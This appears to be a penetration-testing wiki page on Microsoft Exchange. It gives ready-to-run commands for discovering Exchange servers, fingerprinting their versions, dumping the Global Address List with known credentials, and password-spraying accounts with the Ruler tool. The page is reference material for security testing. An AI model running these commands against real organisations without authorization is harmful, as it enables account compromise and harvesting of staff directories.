Exchange services
Theory
Microsoft Exchange Server is a mail server and calendaring server developed by Microsoft. It runs exclusively on Windows Server operating systems.
Practice
Enumeration
Discover Exchange Servers
We can use following commands to discover Exchange servers from a large scope of subdomains:
$ cat subdomains.txt
sub1.example.com
sub2.example.ru
sub3.example.bz
$ for i in `cat subdomains.txt | rev | cut -d. -f1-2 | rev | sort -u`; do echo https://autodiscover.$i; done | httpx -silent -random-agent -fr -t 20 -sc -title -td -ip | grep Outlook | grep -oP '\d+\.\d+\.\d+\.\d+' | dnsx -silent -re -ptr
1.3.3.7 [mx1.example.com]
66.66.66.66 [mx2.example.ru]
123.123.123.123 [mx3.example.bz]
Enumerate Exchange Version
We can use following commands to retreive the Exchange build number and correlate it with the release dates:
curl -sSL https://<TARGET>/owa/auth/logon.aspx -k| grep favicon.ico
# OR
curl https://<TARGET>/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application -k | xmllint --format - | grep version
User Enumeration (GAL)
If access to a domain-joined computer or a corporate email account is obtained, the Global Address List (GAL) can be exported, allowing a list of usernames to be retreived.
Ruler
Ruler (Go) can be used to retreive the GAL using known credentials.
ruler -k -d target.domain -u user -p 'Passw0rd!' -e [email protected] --verbose abk dump -o gal.txt
global-address-list-owa
global-address-list-owa (Python) can also be used to export the Gal using known credentials.
python3 emailextract.py -i exch01.target.domain -u [email protected] -p 'P@ssword!'
Vulnerabilities
PrivExchangeProxyLogonProxyShellProxyNotShellPassword Spray
Password spray is an attack that involves using a single password against multiple accounts. This avoids account lockouts when multiple passwords are used on a single account. More details on this page.
Ruler (Go) can be used to perform password spray attacks
ruler -k --domain target.domain brute --users global_address_list.txt --passwords passwords.txt --verbose -a 4
Resources
Last updated
Was this helpful?